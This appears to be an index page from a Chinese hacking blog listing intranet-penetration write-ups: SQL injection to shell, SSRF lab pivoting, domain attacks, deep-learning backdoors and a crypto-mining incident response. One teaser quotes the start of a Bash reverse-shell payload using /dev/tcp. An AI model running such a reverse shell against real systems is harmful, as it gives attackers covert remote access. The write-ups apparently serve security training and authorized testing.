内网渗透 第6页
实战 | 记一次渗透拿下某儿童色情网站的经过-Pikachu Hacker

实战 | 记一次渗透拿下某儿童色情网站的经过

来源:诚殷网络,作者:X学员经熟人介绍,接到了某地公安的一个关于儿童色情相关的案件,从0到shell的过程。首页界面:个人中心界面:经过对网站的侦察,发现了一处SQL注入漏洞。POST /home/api...
实战 | 记一次SSRF靶场到内网打穿-Pikachu Hacker

实战 | 记一次SSRF靶场到内网打穿

0x0前言靶场网络拓扑如下92883-rn4n90qpxcd.png172.172.0.10 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网,此时攻击者通过公网可以借助 SSRF 漏洞发起对 172 目标内网的...
Pikachu的头像-Pikachu HackerPikachu2个月前
03512
一步步获取你的核心权限-Pikachu Hacker

一步步获取你的核心权限

这是 酒仙桥六号部队 的第 149 篇文章。背景最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段...
Pikachu的头像-Pikachu HackerPikachu2个月前
04912
内网渗透 | 域渗透实操ATT&CK-Pikachu Hacker

内网渗透 | 域渗透实操ATT&CK

0x01 Build UpGoal:目标域控存在一份重要文件。network建议DMZ的web双网卡:一个桥接一个VMnet2。其他的全部是VMnet2。network配置VMnet2配置如上图。ip信息看到分配成功然后互相ping一下没问题...
Pikachu的头像-Pikachu HackerPikachu2个月前
03512
从注入到上线-Pikachu Hacker

从注入到上线

0x01目标声明:本次演练中,所有测试设备均由主办方提供,所有流量均有留档可审计,所有操作均在授权下完成,所有数据在结束后均已安全销毁。直接上目标,这是一个普普通通的某系统。(只能露半...
Pikachu的头像-Pikachu HackerPikachu2个月前
02812
深度学习后门攻击分析与实现(一)(后门攻击名词解释)-Pikachu Hacker

深度学习后门攻击分析与实现(一)(后门攻击名词解释)

在计算机安全中,后门攻击是一种恶意软件攻击方式,攻击者通过在系统、应用程序或设备中植入未经授权的访问点,从而绕过正常的身份验证机制,获得对系统的隐蔽访问权限。这种“后门”允许攻击者...
Pikachu的头像-Pikachu HackerPikachu2个月前
03812
一次平平无奇的渗透测试(渗透测试实验)-Pikachu Hacker

一次平平无奇的渗透测试(渗透测试实验)

这是 酒仙桥六号部队 的第 100 篇文章。全文共计2096个字,预计阅读时长8分钟。前言接了个项目,给了资产列表,刚开始就只挖了几个小洞,正当自暴自弃、随缘挖洞的时候,点开了...
一份通告引发的内网突破-Pikachu Hacker

一份通告引发的内网突破

这是 酒仙桥六号部队 的第 131 篇文章。全文共计2834个字,预计阅读时长9分钟。一、前言本文记录某项目,在开始尝试各类漏洞未果的情况下,利用平台的逻辑缺陷,打造出一份高质...
Pikachu的头像-Pikachu HackerPikachu2个月前
03312
Bash Special Redirection 分析-Pikachu Hacker

Bash Special Redirection 分析

Bash Special Redirection 分析安全脉搏SecPulse.Com独家发文,如需转载,请先联系授权。0x00 Background在反弹 shell 的时候经常遇到这样的 payload:bash -i 1>&/dev/tcp/${H...
实战某高校的一次挖矿病毒的应急处置(大学生挖矿被抓)-Pikachu Hacker

实战某高校的一次挖矿病毒的应急处置(大学生挖矿被抓)

0x00 缘起在风和日丽的周五,我抱着今天搬完砖明天葛优躺的心态开开心心、快快乐乐的工作,没成想刚接到一通电话,电话的那边传来周六需要加班的噩耗,直接打破了周六的葛优躺计划,我周六加班...